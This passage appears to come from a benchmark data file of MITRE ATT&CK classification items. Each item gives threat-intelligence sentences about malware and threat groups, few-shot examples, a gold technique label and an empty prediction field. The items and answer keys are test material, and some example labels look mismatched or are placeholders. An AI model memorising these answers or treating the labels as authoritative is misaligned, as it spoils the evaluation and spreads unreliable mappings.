users (Clipboard Data [T1115\n\t - T1005: Data from Local System\n- Text: After reestablishing access, the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used\n\t - T1105: Ingress Tool Transfer\n- Text: FoggyWeb can remotely exfiltrate sensitive information from a compromised AD FS server.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "TinyTurla can upload files from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ROKRAT can steal credentials by leveraging the Windows Vault mechanism.\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n- Text: PLEAD has the ability to steal saved passwords from Microsoft Outlook.\n\t - T1555: Credentials from Password Stores\n- Text: Before evidence of BlackEnergy2 use in targeted attacks was uncovered, we tracked strange activity on one of the BlackEnergy CnC servers in 2013. This strangeness was related to values listed in newer BlackEnergy configuration files. As described in Dmitry\u2019s 2010 Black DDoS\u2019 analysis, a configuration file is downloaded from the server by main.dll on an infected system. The config file provides download instructions for the loader. In this particular case in 2013, the config file included an unknown plugin set, aside from the usual \u2018ddos\u2019 plugin listing. Displayed below are these new, xml formatted plugin names \u201cweap_hwi\u201d, \u201cps\u201d, and \u201cvsnet\u201d in a BlackEnergy configuration file download from a c2 server. This new module push must have been among the first for this group, because all of the module versions were listed as \u201cversion 1\u201d, including the ddos plugin\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", + "input": "LaZagne can obtain credentials from Vault files.", + "gold": "- T1555.004: Credentials from Password Stores - Windows Credential Manager", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LockBit 2.0 has been known to self-propagate via SMB.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: The Nefilim ransomware downloads the Psexec.exe tool, and it also abuses the Windows built-in WMI (Windows Management Instrumentation) utility for lateral movement. PsExec is a free Microsoft tool that can be used to execute commands and binaries on remote systems and download or upload a file over a network share. Nefilim uses PsExec and WMI with hard-coded admin credentials to remotely execute the batch files and the ransomware file in remote hosts.\n\t - T1570: Lateral Tool Transfer\n- Text: TEMP.Veles utilized RDP throughout an operation.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n", + "input": "APT3 has a tool that can copy files to remote machines.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Reaver proceeds to write a shortcut file to \u2018%TEMP%\\~WUpdate.lnk\u2019. This file is then copied to a filename of \u2018Windows Update.lnk\u2019, which is placed in the startup path previously identified. This shortcut file points to the path of the previously written \u2018Applet.cpl\u2019 file. Finally, Reaver.v1 will execute the \u2018~WUpdate.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file. In the event this is successful, the malware will use the following path to store any dropped files\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n- Text: One variant of BlackEnergy creates a new service using either a hard-coded or randomly generated name.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: XCSSET adds malicious file paths to the \"DYLD_FRAMEWORK_PATH\" and \"DYLD_LIBRARY_PATH\" environment variables to execute malicious code.\n\t - T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking\n", + "input": "KONNI has registered itself as a service using its export function.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese Government employee, implying that the email was sent from a valid but compromised account\n\t - T1204.002: User Execution - Malicious File\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: On February 12, 2018 at 16:45 (all times are in the organization\u2019s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Indicators of Compromise (IoCs) C&C servers Ssl[.]arkouthrie[.]com s3[.]hiahornber[.]com widget[.]shoreoa[.]com SHA256 Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4 Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f The post New MacOS Backdoor Linked to OceanLotus Found appeared first on\n\t - T1008: Fallback Channels\n- Text: DarkWatchman has used a DGA to generate a domain name for C2.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: Network activity started with an HTTPS URL to namecha[.]in, which is an alternative namecoin block explorer. Namecoin is a cryptocurrency system that can be used for decentralized DNS. That proves to be the case here, since the URL returned an IP address used for subsequent post-infection traffic as shown in Figure 10\n\t - T1568: Dynamic Resolution\n", + "input": "WinMM is usually configured with primary and backup domains for C2 communications.", + "gold": "- T1008: Fallback Channels", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: On balance, the fall campaigns diverged from Bulgarian themed NetWire campaigns in the early summer in scope and scale. These campaigns distributed NetWire variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through certutils. The NetWire malware has been around since at least 2002 and has been consistently in use by various actors across the threat landscape. This analysis shows groupings of similar campaigns distributing NetWire based on message attributes, email lures and language, Office document metadata, VBA Macro code, and malware configuration\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: On February 12, 2018 at 16:45 (all times are in the organization\u2019s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: The user receives a phishing email with a ZIP attachment containing an Office document with embedded macros, the document itself or a link to download malicious document. The user opens the malicious attachment/link and is tricked into clicking \u201cEnable content\u201d. - A malicious macro is executed. One of the encrypted resources has the DLL binary (loader) which is decrypted later during runtime\n\t - T1204.001: User Execution - Malicious Link\n\t - T1204.002: User Execution - Malicious File\n", + "input": "During C0011, Transparent Tribe sent malicious attachments via email to student targets in India.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Volexity is seeing active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal e-mail and compromise networks. In January 2021, through its Network Security Monitoring service, Volexity detected anomalous activity from two of its customers' Microsoft Exchange servers. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. Additionally, Volexity is providing alternative mitigations that may be used by defenders to assist in securing their Microsoft Exchange instances. This vulnerability has been confirmed to exist within the latest version of Exchange 2016 on a fully patched Windows Server 2016 server. Volexity also confirmed the vulnerability exists in Exchange 2019 but has not tested against a fully patched version, although it believes they are vulnerable. There are two methods to download e-mail with this vulnerability, depending on the way that Microsoft Exchange has been configured. In the case where a single server is being used to provide the Exchange service, Volexity believes the attacker must know the targeted user\u2019s domain security identifier (SID) in order to access their mailbox. Further other notable User-Agent entries tied to tools used for post-exploitation access to webshells. Network Indicators - Attacker IPs . Volexity has observed numerous IP addresses leveraged by the attackers to exploit the vulnerabilities described in this blog\n\t - T1190: Exploit Public-Facing Application\n- Text: shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit\n\t - T1210: Exploitation of Remote Services\n- Text: The first spear phish from group \u201cAdmin@338\u201d was sent to a foreign government in the Asian Pacific region on March 10, 2014 \u2013 just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, \u201cMalaysian Airlines MH370.doc\u201d (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of \u201cdecoy content\u201d upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1203: Exploitation for Client Execution\n\t - T1566: Phishing\n", + "input": "Blue Mockingbird has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.", + "gold": "- T1190: Exploit Public-Facing Application", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: leveraged several compromised universities as proxies to obscure its origin.\n\t - T1090: Proxy\n- Text: In order to exfiltrate data from a network segment not connected to the Internet, the threat actor deployed a modified version of hTran. This \u2018connection bouncer\u2019 tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic. There have been numerous reports of hTran being used by different Chinese threat actors, including: APT3, APT27 and DragonOK\n\t - T1090.002: Proxy - External Proxy\n- Text: Traffic traversing the Tor network will be forwarded to multiple nodes before exiting the Tor network and continuing on to its intended destination.\n\t - T1090.003: Proxy - Multi-hop Proxy\n", + "input": "Green Lambert can use proxies for C2 traffic.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pteranodon has used various API calls.\n\t - T1106: Native API\n- Text: TrickBot has the ability to capture RDP credentials by capturing the \"CredEnumerateA\" API\n\t - T1056.004: Input Capture - Credential API Hooking\n- Text: ROKRAT can check for debugging tools.\n\t - T1622: Debugger Evasion\n", + "input": "Maze has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe.\n\t - T1055.004: Process Injection - Asynchronous Procedure Call\n- Text: Trojan.Karagany can upload, download, and execute files on the victim.\n\t - T1105: Ingress Tool Transfer\n", + "input": "UNC2452 used Rundll32 to execute payloads.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has been known to brute force password hashes to be able to leverage plain text credentials.\n\t - T1110: Brute Force\n- Text: OilRig has run \"net user\", \"net user /domain\", \"net group \u201cdomain admins\u201d /domain\", and \"net group \u201cExchange Trusted Subsystem\u201d /domain\" to get account listings on a victim.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Lucifer has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and passwords.\n\t - T1110.001: Brute Force - Password Guessing\n", + "input": "PoshC2 has modules for brute forcing local administrator and AD user accounts.", + "gold": "- T1110: Brute Force", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Action RAT has the ability to collect the MAC address of an infected host.\n\t - T1016: System Network Configuration Discovery\n- Text: PoetRAT used Nmap for remote system discovery.\n\t - T1018: Remote System Discovery\n- Text: Cuba can use the function \"GetIpNetTable\" to recover the last connections to the victim's machine.\n\t - T1049: System Network Connections Discovery\n", + "input": "APT32 used the \"ipconfig /all\" command to gather the IP address from the system.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It creates the folder \"\\ProgramData\\AuditService\\\" and copies the clean file \"lsass.exe\" (taken from \"\\Windows\\System32\\\") into the folder. The tainted \"services.exe\" installs \"\\ProgramData\\AuditService\\lsass.exe\" as an autostart Windows service named \"Audit Service\". When the new \"lsass.exe\" service autostarts, the malicious file \"sspisrv.dll\" sideloads in the same folder. lsass.exe\" will eventually crash because of a failure to load other dependencies\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1569.002: System Services - Service Execution\n- Text: uses to execute a payload or commands on a remote host.\n\t - T1569.002: System Services - Service Execution\n- Text: Okrum can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "StrongPity has created new services and modified existing services for persistence.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire includes various modules for enumerating Group Policy.\n\t - T1615: Group Policy Discovery\n- Text: Bankshot gathers domain and account names/information through process monitoring.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Chimera has used \"net user\" for account discovery.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "BloodHound has the ability to collect local admin information via GPO.", + "gold": "- T1615: Group Policy Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. These new processes will first spawn a net.exe processing with the view argument to gather a list of network accessible hosts. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted\n\t - T1135: Network Share Discovery\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- Text: mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: Blue Mockingbird has used JuicyPotato to abuse the \"SeImpersonate\" token privilege to escalate from web application pool accounts to NT Authority\\SYSTEM.\n\t - T1134: Access Token Manipulation\n", + "input": "Aria-body has the ability to duplicate a token from ntprint.exe.", + "gold": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n- Text: Agent Tesla has the ability to extract credentials from configuration or support files.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n- Text: The malware will actually search through the /Users/ folder looking for executable files. When it finds one, it will prepend malicious code to the beginning of the file. This means that when the file is executed, the malicious code is executed first. That code will then copy the legit file content into a new, invisible file and execute that\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n\t - T1554: Compromise Host Software Binary\n", + "input": "Lokibot has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.", + "gold": "- T1555: Credentials from Password Stores", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.\n\t - T1204.001: User Execution - Malicious Link\n- Text: A Word document delivering TYPEFRAME prompts the user to enable macro execution.\n\t - T1204.002: User Execution - Malicious File\n- Text: During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Patchwork has used spearphishing with links to try to get users to click, download and open malicious files.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacMa can enumerate running processes.\n\t - T1057: Process Discovery\n- Text: Although it has only recently been launched, IcedID already uses redirection attacks. The redirection scheme IcedID uses is not a simple handover to another website with a different URL. Rather, it is designed to appear as seamless as possible to the victim. These tactics include displaying the legitimate bank\u2019s URL in the address bar and the bank\u2019s correct SSL certificate, which is made possible by keeping a live connection with the actual bank\u2019s site\n\t - T1185: Browser Session Hijacking\n- Text: SombRAT has the ability to modify its process memory to hide process command-line arguments.\n\t - T1564.010: Hide Artifacts - Process Argument Spoofing\n", + "input": "PowerStallion has been used to monitor process lists.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.\n\t - T1082: System Information Discovery\n- Text: APT41 used the WMIEXEC utility to execute \"whoami\" commands on remote machines.\n\t - T1033: System Owner/User Discovery\n- Text: Its functions include self-starting of the backdoor, collection of network configuration, keystroke records, and schedule other modules to execute by means of timers\n\t - T1016: System Network Configuration Discovery\n", + "input": "Caterpillar WebShell has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has sent malicious Word OLE compound documents to victims.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: NanHaiShu executes additional VBScript code on the victim's machine.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious attachment.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "During Operation Sharpshooter, threat actors sent malicious Word OLE documents to victims.", + "gold": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros. When the file is opened, it loads in Microsoft Excel and urges the user to enable macros\n\t - T1204.002: User Execution - Malicious File\n- Text: Metamorfo has been delivered to victims via emails with malicious HTML attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Mofang's spearphishing emails required a user to click the link to connect to a compromised website.\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "APT38 has attempted to lure victims into enabling malicious macros within email attachments.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has the capability to gather the victim's proxy information.\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1557.002\n- Text: C2 Command Purpose reboot Reboot the system using shutdown command shutdown Shut down the system using shutdown command clean Wipe the Drives, C:\\, D:\\, E:\\, F:\\ screenshot Take a screenshot of the System upload Encrypt and upload the information from the system excel Leverage Excel.Application COM object for code execution outlook Leverage Outlook.Application COM object for code execution risk Leverage DCOM object for code execution Conclusion This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware\n\t - T1113: Screen Capture\n\t - T1082: System Information Discovery\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1106: Native API\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "FALLCHILL collects MAC address and local IP address information from the victim.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: An downloader uses the Windows command \"cmd.exe\" /C whoami to verify that it is running with the elevated privileges of \u201cSystem.\u201d\n\t - T1033: System Owner/User Discovery\n- Text: Net commands used with the \"/domain\" flag can be used to gather information about and manipulate user accounts on the current domain.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Chinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\t - T1078.001: Valid Accounts - Default Accounts\n\t - T1078.002: Valid Accounts - Domain Accounts\n", + "input": "LitePower can determine if the current user has admin privileges.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This 